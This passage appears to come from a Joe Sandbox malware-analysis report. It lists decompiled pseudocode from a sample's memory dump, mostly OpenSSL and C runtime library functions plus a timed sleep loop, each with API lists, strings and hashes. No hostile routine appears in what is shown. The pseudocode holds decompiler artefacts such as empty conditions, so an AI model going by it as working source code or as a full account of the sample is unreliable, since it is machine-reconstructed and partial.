						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						E0042F7C0(4);
						_t140 = _a8;
						_t214 = 0;
						__eflags = _t140;
						_v16 = 0;
						_t196 =  !=  ? _t140 : "<NULL>";
						_t141 = 0;
						_a8 = _t196;
						__eflags =  *_t196;
						if( *_t196 != 0) {
							do {
								_t141 = _t141 + 1;
								__eflags =  *(_t141 + _t196);
							} while ( *(_t141 + _t196) != 0);
						}
						_t199 =  <  ? _t214 : _a16 - _t141;
						__eflags = _a12 & 0x00000001;
						_a16 = _t199;
						if((_a12 & 0x00000001) != 0) {
							_t199 =  ~_t199;
							_a16 = _t199;
						}
						_push(_t181);
						_t182 = _v0;
						_push(_t249);
						_t250 = _v8;
						_push(_t232);
						_t233 = _a4;
						_push(_t220);
						_t221 = _v4;
						__eflags = _t199;
						if(_t199 > 0) {
							while(1) {
								__eflags = _t214 - _a20;
								if(_t214 >= _a20) {
									goto L71;
								}
								__eflags = _t221;
								if(_t221 != 0) {
									__eflags =  *_t182 -  *_t233;
									if( *_t182 >=  *_t233) {
										do {
											__eflags =  *_t221;
											if( *_t221 != 0) {
												 *_t233 =  *_t233 + 0x400;
												__eflags =  *_t233;
												_t150 = E00454F30( *_t221,  *_t233, ".\\crypto\\bio\\b_print.c", 0x2ed);
												_t253 = _t253 + 0x10;
												 *_t221 = _t150;
											} else {
												__eflags =  *_t233;
												if( *_t233 == 0) {
													 *_t233 = 0x400;
												}
												 *_t221 = E00454E50( *_t233, ".\\crypto\\bio\\b_print.c", 0x2e5);
												_t253 = _t253 + 0xc;
												_t206 =  *_t182;
												__eflags = _t206;
												if(_t206 != 0) {
													E0042D8D0(_t152, _v0, _t206);
													_t253 = _t253 + 0xc;
												}
												_v0 = 0;
											}
											__eflags =  *_t182 -  *_t233;
										} while ( *_t182 >=  *_t233);
										_t214 = _v16;
									}
								}
								_t203 =  *_t182;
								__eflags = _t203 -  *_t233;
								if(_t203 <  *_t233) {
									_t148 = _v0;
									__eflags = _t148;
									if(_t148 == 0) {
										 *((char*)(_t203 +  *_t221)) = 0x20;
									} else {
										 *((char*)(_t148 + _t203)) = 0x20;
									}
									 *_t182 =  *_t182 + 1;
									__eflags =  *_t182;
								}
								_t214 = _t214 + 1;
								_t205 = _a16 - 1;
								_v16 = _t214;
								_a16 = _t205;
								__eflags = _t205;
								if(_t205 > 0) {
									continue;
								}
								goto L71;
							}
						}
						L71:
						_t200 = _a8;
						_t143 =  *_t200;
						__eflags = _t143;
						if(_t143 != 0) {
							_a8 = _t200 - _t214;
							while(1) {
								__eflags = _t214 - _a20;
								if(_t214 >= _a20) {
									goto L75;
								}
								E00456F70(_t250, _t221, _t182, _t233, _t143);
								_t253 = _t253 + 0x14;
								_t214 = _v16 + 1;
								_v16 = _t214;
								_t143 =  *((intOrPtr*)(_a8 + _t214));
								__eflags = _t143;
								if(_t143 != 0) {
									continue;
								}
								goto L75;
							}
						}
						L75:
						__eflags = _a16;
						if(_a16 < 0) {
							while(1) {
								__eflags = _t214 - _a20;
								if(_t214 >= _a20) {
									goto L78;
								}
								_t143 = E00456F70(_t250, _t221, _t182, _t233, 0x20);
								_t253 = _t253 + 0x14;
								_t214 = _v16 + 1;
								_t124 =  &_a16;
								 *_t124 = _a16 + 1;
								__eflags =  *_t124;
								_v16 = _t214;
								if( *_t124 < 0) {
									continue;
								}
								goto L78;
							}
						}
						L78:
						return _t143;
					} else {
						goto L18;
					}
				} else {
					_t220 = 0x19;
					_a16 = 0x19;
					L18:
					_t184 = _a100;
					_t217 = _t232;
					 *((char*)(_t253 + _t220 + 0x30)) = 0;
					_t208 = _t184 - _t220;
					_t235 = _t217 + 1;
					do {
						_t154 =  *_t217;
						_t217 = _t217 + 1;
					} while (_t154 != 0);
					_t218 = _t217 - _t235;
					_t156 =  >=  ? _t184 : _t220;
					_t237 = _a96 - ( >=  ? _t184 : _t220);
					_t268 = _a12;
					_t238 = _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0);
					_t209 =  <  ? 0 : _t208;
					_t239 = _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0) - _t217 - _t235;
					_a24 = _t209;
					_t240 =  <  ? 0 : _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0) - _t217 - _t235;
					_t160 = _a104;
					_a96 = _t240;
					if((_t160 & 0x00000010) != 0) {
						_t246 =  >=  ? _t209 : _t240;
						_a24 =  >=  ? _t209 : _t240;
						_t240 = 0;
						_a96 = 0;
					}
					if((_t160 & 0x00000001) != 0) {
						_t240 =  ~_t240;
						_a96 = _t240;
					}
					_t64 =  &_a28; // 0x456c55
					_t185 =  *_t64;
					if(_t240 > 0) {
						_t226 = _a8;
						do {
							E00456F70(_t249, _t185, _t226, _v0, 0x20);
							_t240 = _t240 - 1;
							_t253 = _t253 + 0x14;
						} while (_t240 > 0);
						_t220 = _a16;
						_a96 = _t240;
					}
					_t161 = _a12;
					if(_a12 != 0) {
						E00456F70(_t249, _t185, _a8, _v0, _t161);
						_t253 = _t253 + 0x14;
					}
					_t163 =  *_a4;
					if( *_a4 != 0) {
						_t245 = _a8;
						_t225 = _v0;
						do {
							E00456F70(_t249, _t185, _t245, _t225, _t163);
							_t253 = _t253 + 0x14;
							_t174 = _a4 + 1;
							_a4 = _t174;
							_t163 =  *_t174;
						} while ( *_t174 != 0);
						_t240 = _a96;
						_t220 = _a16;
					}
					if(_a24 > 0) {
						_t244 = _a8;
						_t224 = _v0;
						do {
							E00456F70(_t249, _t185, _t244, _t224, 0x30);
							_t253 = _t253 + 0x14;
							_t170 = _a24 - 1;
							_a24 = _t170;
						} while (_t170 > 0);
						_t240 = _a96;
						_t220 = _a16;
					}
					if(_t220 > 0) {
						_t243 = _a8;
						do {
							_t166 =  *((char*)(_t253 + _t220 + 0x2f));
							_t220 = _t220 - 1;
							E00456F70(_t249, _t185, _t243, _v0, _t166);
							_t253 = _t253 + 0x14;
						} while (_t220 > 0);
						_t240 = _a96;
					}
					if(_t240 < 0) {
						_t242 =  ~_t240;
						do {
							E00456F70(_t249, _t185, _a8, _v0, 0x20);
							_t253 = _t253 + 0x14;
							_t242 = _t242 - 1;
						} while (_t242 != 0);
					}
					_pop(_t223);
					_pop(_t241);
					_pop(_t186);
					return E0042A77E(_t186, _a60 ^ _t253, _t218, _t223, _t241);
				}
			}

APIs

__aulldvrm.LIBCMT ref: 004574E9

Strings

+, xrefs: 00457475
0123456789ABCDEF, xrefs: 004574D6
UlE, xrefs: 00457596, 004575A9, 004575D1, 004575F6, 0045762A, 0045765D, 0045767F
, xrefs: 00457482
0123456789abcdef, xrefs: 004574C4

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: __aulldvrm
String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
API String ID: 1302938615-3129329331
Opcode ID: ff954d4489a2a32b54fea3d22a27fd44705d04e06401a65576fda6a57d4a9bd9
Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
Opcode Fuzzy Hash: ff954d4489a2a32b54fea3d22a27fd44705d04e06401a65576fda6a57d4a9bd9
Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96

Uniqueness

Uniqueness Score: -1.00%

Function 00411B10 Relevance: 10.6, APIs: 7, Instructions: 50
timewindowsleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411B10() {
				intOrPtr _v8;
				struct tagMSG _v36;
				long _t9;
				long _t11;
				intOrPtr _t19;

				_t1 = timeGetTime() + 0x1388; // 0x1388
				_t19 = _t1;
				_v8 = _t19;
				_t9 = timeGetTime();
				if(_t19 > _t9) {
					do {
						_t11 = PeekMessageW( &_v36, 0, 0, 0, 1);
						if(_t11 == 0) {
							goto L5;
						}
						while(_v36.message != 0x12) {
							DispatchMessageW( &_v36);
							_t11 = PeekMessageW( &_v36, 0, 0, 0, 1);
							if(_t11 != 0) {
								continue;
							}
							goto L5;
						}
						break;
						L5:
						Sleep(0x64);
						_t11 = timeGetTime();
					} while (_v8 > _t11);
					return _t11;
				}
				return _t9;
			}

APIs

timeGetTime.WINMM ref: 00411B1E
timeGetTime.WINMM ref: 00411B29
PeekMessageW.USER32 ref: 00411B4C
DispatchMessageW.USER32 ref: 00411B5C
PeekMessageW.USER32 ref: 00411B6A
Sleep.KERNEL32(00000064,?,?,0041EE2F), ref: 00411B72
timeGetTime.WINMM ref: 00411B78

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: MessageTimetime$Peek$DispatchSleep
String ID:
API String ID: 3697694649-0
Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004416EB Relevance: 9.1, APIs: 6, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004416EB(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v32;
				signed int _t16;
				intOrPtr _t17;
				signed int _t19;
				signed int _t20;
				signed int _t30;
				intOrPtr* _t35;
				intOrPtr* _t37;
				signed int* _t40;
				void* _t48;
				signed int _t50;
				signed int _t54;
				signed int _t57;
				intOrPtr _t58;
				intOrPtr _t59;

				_t48 = __edx;
				_t40 = _a4;
				_t65 = _t40;
				if(_t40 != 0) {
					 *_t40 =  *_t40 & 0x00000000;
					_t54 = _a12;
					_t50 = _a8;
					__eflags = _t50;
					if(_t50 == 0) {
						__eflags = _t54;
						if(__eflags == 0) {
							goto L4;
						} else {
							goto L13;
						}
					} else {
						__eflags = _t54;
						if(__eflags == 0) {
							L13:
							_t35 = E00425208(__eflags);
							_t58 = 0x16;
							 *_t35 = _t58;
							E004242D2();
							_t17 = _t58;
							goto L10;
						} else {
							L4:
							__eflags = _t50;
							if(_t50 != 0) {
								 *_t50 = 0;
							}
							_t16 = E00441667(_a16);
							_a4 = _t16;
							__eflags = _t16;
							if(_t16 == 0) {
								L15:
								_t17 = 0;
								goto L10;
							} else {
								_t19 = E0042C160(_t16) + 1;
								 *_t40 = _t19;
								__eflags = _t54;
								if(_t54 == 0) {
									goto L15;
								} else {
									__eflags = _t19 - _t54;
									if(_t19 <= _t54) {
										_t20 = E0042C0FD(_t50, _t54, _a4);
										__eflags = _t20;
										if(_t20 != 0) {
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											E004242FD(_t40, _t48);
											asm("int3");
											_push(0xc);
											_push(0x508078);
											E00428520(_t40, _t50, _t54);
											_v32 = _v32 & 0x00000000;
											_t56 = _a4;
											__eflags = _a4;
											__eflags = 0 | _a4 != 0x00000000;
											if(__eflags != 0) {
												__eflags = E00448FF4(_t56, 0x7fff) - 0x7fff;
												asm("sbb eax, eax");
												if(__eflags == 0) {
													goto L17;
												} else {
													E00428AF7(7);
													_t12 =  &_v8;
													 *_t12 = _v8 & 0x00000000;
													__eflags =  *_t12;
													_t57 = E00441667(_t56);
													_v32 = _t57;
													_v8 = 0xfffffffe;
													E004417FD();
													_t30 = _t57;
												}
											} else {
												L17:
												 *((intOrPtr*)(E00425208(__eflags))) = 0x16;
												E004242D2();
												_t30 = 0;
											}
											return E00428565(_t30);
										} else {
											goto L15;
										}
									} else {
										_t17 = 0x22;
										L10:
										goto L11;
									}
								}
							}
						}
					}
				} else {
					_t37 = E00425208(_t65);
					_t59 = 0x16;
					 *_t37 = _t59;
					E004242D2();
					_t17 = _t59;
					L11:
					return _t17;
				}
			}

APIs

__getenv_helper_nolock.LIBCMT ref: 00441726
__invoke_watson.LIBCMT ref: 00441780
_strlen.LIBCMT ref: 00441734

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

_strnlen.LIBCMT ref: 004417BF
__lock.LIBCMT ref: 004417D0
__getenv_helper_nolock.LIBCMT ref: 004417DB

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
String ID:
API String ID: 3534693527-0
Opcode ID: b31f97ea329719022fda34d1be00e9f165c1a047629ea24459edfa5c04f004d4
Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
Opcode Fuzzy Hash: b31f97ea329719022fda34d1be00e9f165c1a047629ea24459edfa5c04f004d4
Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD

Uniqueness

Uniqueness Score: -1.00%

Function 004506A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 29%

			E004506A0(void* __ebp, intOrPtr _a4, signed int _a8, intOrPtr _a12, char _a16, char _a80, char _a144, signed int _a208, unsigned int _a216, intOrPtr* _a220, intOrPtr _a224) {
				intOrPtr _v0;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				intOrPtr _t35;
				intOrPtr _t43;
				char* _t46;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr* _t57;
				void* _t65;
				void* _t66;
				intOrPtr* _t67;
				unsigned int _t68;
				void* _t69;
				signed int _t73;
				intOrPtr _t74;
				signed int _t75;
				void* _t76;
				signed int _t77;

				E0042F7C0(0xd4);
				_t29 =  *0x50ad20; // 0xa4c21a8c
				_a208 = _t29 ^ _t75;
				_t54 = _a224;
				_t68 = _a216;
				_t67 = _a220;
				_t73 = _t68 >> 0x0000000c & 0x00000fff;
				_a8 = _t68 & 0x00000fff;
				_a4 = E00450DF0(_t54, _t65, _t67, _t73, _t68);
				_v0 = E00450870(_t54, _t67, _t73, _t68);
				_t35 = E004513B0(_t54, _t65, _t67, _t73, _t68);
				_t76 = _t75 + 0xc;
				_a12 = _t35;
				if(_a4 == 0) {
					_push(_t68 >> 0x18);
					_push("lib(%lu)");
					_push(0x40);
					_push( &_a144);
					E004567A0(_t68 >> 0x18);
					_t76 = _t76 + 0x10;
				}
				_t81 = _v0;
				if(_v0 == 0) {
					_push(_t73);
					_push("func(%lu)");
					_push(0x40);
					_push( &_a80);
					E004567A0(_t81);
					_t76 = _t76 + 0x10;
				}
				_t74 = _a12;
				_t82 = _t74;
				if(_t74 == 0) {
					_push(_a8);
					_push("reason(%lu)");
					_push(0x40);
					_push( &_a16);
					E004567A0(_t82);
					_t76 = _t76 + 0x10;
				}
				_t55 = _v0;
				_t37 =  !=  ? _t74 :  &_a16;
				_push( !=  ? _t74 :  &_a16);
				_t39 =  !=  ? _t55 :  &_a80;
				_push( !=  ? _t55 :  &_a80);
				_t41 =  !=  ? _a4 :  &_a144;
				E004567A0(_a4, _t67, _t54, "error:%08lX:%s:%s:%s", _t68,  !=  ? _a4 :  &_a144);
				_t57 = _t67;
				_t77 = _t76 + 0x1c;
				_t66 = _t57 + 1;
				do {
					_t43 =  *_t57;
					_t57 = _t57 + 1;
				} while (_t43 != 0);
				if(_t57 - _t66 == _t54 - 1 && _t54 > 4) {
					_t69 = 0;
					_t54 = _t54 + _t67;
					do {
						_t46 = E00431C30(_t67, 0x3a);
						_t77 = _t77 + 8;
						if(_t46 == 0 || _t46 > _t54 - 5 + _t69) {
							_t46 = _t54 - 5 + _t69;
							 *_t46 = 0x3a;
						}
						_t69 = _t69 + 1;
						_t25 = _t46 + 1; // 0x2
						_t67 = _t25;
					} while (_t69 < 4);
				}
				return E0042A77E(_t54, _a208 ^ _t77, _t66, _t67, _t68);
			}

APIs

___from_strstr_to_strchr.LIBCMT ref: 004507C3

Strings

lib(%lu), xrefs: 0045071C
reason(%lu), xrefs: 00450758
func(%lu), xrefs: 00450734
error:%08lX:%s:%s:%s, xrefs: 00450792

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: ___from_strstr_to_strchr
String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
API String ID: 601868998-2416195885
Opcode ID: 93747ef9676871f384b6e598e8205c6ebfa69a96be3ff907559ef05580cb13b5
Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
Opcode Fuzzy Hash: 93747ef9676871f384b6e598e8205c6ebfa69a96be3ff907559ef05580cb13b5
Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96

Uniqueness

Uniqueness Score: -1.00%

Function 0045AE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E0045AE30(void* __ebx, void* __edx, void* __ebp, char _a4, char _a8) {
				void* __edi;
				intOrPtr _t18;
				intOrPtr _t19;
				signed int _t40;
				intOrPtr _t43;
				signed int _t44;
				intOrPtr _t51;
				intOrPtr* _t52;
				intOrPtr _t53;

				_t55 = __ebp;
				_t1 =  &_a8; // 0x463967
				_t53 =  *_t1;
				_t2 =  &_a4; // 0x463967
				_t52 =  *_t2;
				_t43 =  *_t52;
				if(_t43 < _t53) {
					__eflags =  *(_t52 + 8) - _t53;
					if( *(_t52 + 8) < _t53) {
						__eflags = _t53 - 0x5ffffffc;
						if(__eflags <= 0) {
							_t44 = _t53 + 3;
							_t50 = 0xaaaaaaab * _t44 >> 0x20;
							_t18 =  *((intOrPtr*)(_t52 + 4));
							_push(__ebx);
							_t40 = 0xaaaaaaab * _t44 >> 0x20 >> 1 << 2;
							__eflags = _t18;
							if(_t18 != 0) {
								_t19 = E00454FB0(_t50, _t18,  *(_t52 + 8), _t40, ".\\crypto\\buffer\\buffer.c", 0xa6);
							} else {
								_t19 = E00454E50(_t40, ".\\crypto\\buffer\\buffer.c", 0xa4);
							}
							_t51 = _t19;
							__eflags = _t51;
							if(__eflags != 0) {
								__eflags = _t53 -  *_t52;
								 *((intOrPtr*)(_t52 + 4)) = _t51;
								 *(_t52 + 8) = _t40;
								E0042B420( *_t52 + _t51, 0, _t53 -  *_t52);
								 *_t52 = _t53;
								return _t53;
							} else {
								E004512D0(_t40, _t51, _t52, _t55, __eflags, 7, 0x69, 0x41, ".\\crypto\\buffer\\buffer.c", 0xa9);
								__eflags = 0;
								return 0;
							}
						} else {
							E004512D0(__ebx, __edx, _t52, __ebp, __eflags, 7, 0x69, 0x41, ".\\crypto\\buffer\\buffer.c", 0x9f);
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags =  *((intOrPtr*)(_t52 + 4)) + _t43;
						E0042B420( *((intOrPtr*)(_t52 + 4)) + _t43, 0, _t53 - _t43);
						 *_t52 = _t53;
						return _t53;
					}
				} else {
					E0042B420( *((intOrPtr*)(_t52 + 4)) + _t53, 0, _t43 - _t53);
					 *_t52 = _t53;
					return _t53;
				}
			}

APIs

_memset.LIBCMT ref: 0045AE4B
_memset.LIBCMT ref: 0045AE6C

Strings

g9F, xrefs: 0045AE31, 0045AE36, 0045AE63, 0045AF14, 0045AF1D
.\crypto\buffer\buffer.c, xrefs: 0045AE88, 0045AEBE, 0045AED3, 0045AEF0

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$g9F
API String ID: 2102423945-3653307630
Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9

Uniqueness

Uniqueness Score: -1.00%

Function 00425341 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 62%

			E00425341(void* __ebx, void* __edi, intOrPtr _a4) {
				char* _v24;
				intOrPtr _v28;
				signed int _v36;
				signed int _v40;
				short _v300;
				void* __esi;
				void* _t15;
				void* _t17;
				signed int _t20;
				char* _t22;
				signed int _t30;
				void* _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t49;
				void* _t51;
				signed int _t52;

				if(_a4 != 0) {
					_push(__ebx);
					_t30 = E0043749C(_a4, 0x55);
					if(_t30 < 0x55) {
						_push(__edi);
						_t15 = E00428CDE(_t40, 2 + _t30 * 2);
						_t42 = _t15;
						if(_t42 != 0) {
							_t5 = _t30 + 1; // 0x1
							_t17 = E004374F1(_t42, _t5, _a4, _t5);
							_t52 = _t51 + 0x10;
							if(_t17 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E004242FD(_t30, _t40);
								asm("int3");
								_t49 = _t47;
								_push(_t49);
								_t50 = _t52;
								_t20 =  *0x50ad20; // 0xa4c21a8c
								_v40 = _t20 ^ _t52;
								_t22 = _v24;
								_t45 = _v28;
								if(_v28 <= 5 && _t22 != 0 && MultiByteToWideChar(0, 0, _t22, 0xffffffff,  &_v300, 0x83) != 0) {
									E00425A97(_t30, _t40, _t45,  &_v300);
								}
								_pop(_t46);
								return E0042A77E(_t30, _v36 ^ _t50, _t40, _t42, _t46);
							} else {
								_t15 = _t42;
								goto L5;
							}
						} else {
							L5:
							goto L6;
						}
					} else {
						_t15 = 0;
						L6:
						return _t15;
					}
				} else {
					return 0;
				}
			}

APIs

_wcsnlen.LIBCMT ref: 00425354

Strings

U, xrefs: 0042535D

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _wcsnlen
String ID: U
API String ID: 3628947076-3372436214
Opcode ID: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
Opcode Fuzzy Hash: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD

Uniqueness

Uniqueness Score: -1.00%

Function 00462FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00462FF0(intOrPtr* _a4, void _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				signed int _t11;
				signed int _t14;
				intOrPtr* _t15;
				void* _t16;
				signed int _t19;
				intOrPtr _t20;
				signed int _t26;
				void* _t27;
				intOrPtr* _t28;
				void* _t29;
				intOrPtr* _t33;
				intOrPtr* _t34;
				void* _t36;
				void* _t40;
				void* _t41;

				_t28 = _a16;
				if(_t28 == 0) {
					_t10 = E0047D440();
					_t38 = _a12;
					__eflags = _t10;
					_t24 = _a8;
					_t33 = _a4;
					_t31 =  !=  ? _t10 : "Enter PEM pass phrase:";
					_t11 = E0047D480(_t28, _a12, _t33, 4, _a8,  !=  ? _t10 : "Enter PEM pass phrase:", _a12, _t29);
					_t41 = _t40 + 0x14;
					__eflags = _t11;
					if(__eflags != 0) {
						L9:
						E004512D0(_t24, _t28, _t31, _t38, __eflags, 9, 0x64, 0x6d, ".\\crypto\\pem\\pem_lib.c", 0x6f);
						_t14 = E0042B420(_t33, 0, _t24) | 0xffffffff;
						__eflags = _t14;
					} else {
						do {
							_t15 = _t33;
							_t28 = _t15 + 1;
							do {
								_t26 =  *_t15;
								_t15 = _t15 + 1;
								__eflags = _t26;
							} while (_t26 != 0);
							_t14 = _t15 - _t28;
							__eflags = _t14 - 4;
							if(__eflags < 0) {
								goto L8;
							}
							goto L10;
							L8:
							_push(4);
							_push("phrase is too short, needs to be at least %d chars\n");
							_t16 = E00420E4D();
							E00422408(_t24, _t31, _t33, __eflags);
							_t19 = E0047D480(_t28, _t38, _t33, 4, _t24, _t31, _t38, _t16 + 0x40);
							_t41 = _t41 + 0x20;
							__eflags = _t19;
						} while (__eflags == 0);
						goto L9;
					}
					L10:
					return _t14;
				} else {
					_t34 = _t28;
					_t27 = _t34 + 1;
					do {
						_t20 =  *_t34;
						_t34 = _t34 + 1;
					} while (_t20 != 0);
					_t36 =  >  ? _a8 : _t34 - _t27;
					E0042D8D0(_a4, _t28, _t36);
					return _t36;
				}
			}

APIs

_fprintf.LIBCMT ref: 0046307E
_memset.LIBCMT ref: 004630AB

Strings

Enter PEM pass phrase:, xrefs: 00463036, 00463043, 00463084
phrase is too short, needs to be at least %d chars, xrefs: 00463070
.\crypto\pem\pem_lib.c, xrefs: 00463097

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _fprintf_memset
String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
API String ID: 3021507156-3399676524
Opcode ID: 37c0a0619d1de68f8926526a4348b91c256fa9f986865ef3ae2ab210aec5a9ed
Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
Opcode Fuzzy Hash: 37c0a0619d1de68f8926526a4348b91c256fa9f986865ef3ae2ab210aec5a9ed
Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA

Uniqueness

Uniqueness Score: -1.00%

Function 0043B6FF Relevance: 7.6, APIs: 5, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E0043B6FF(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
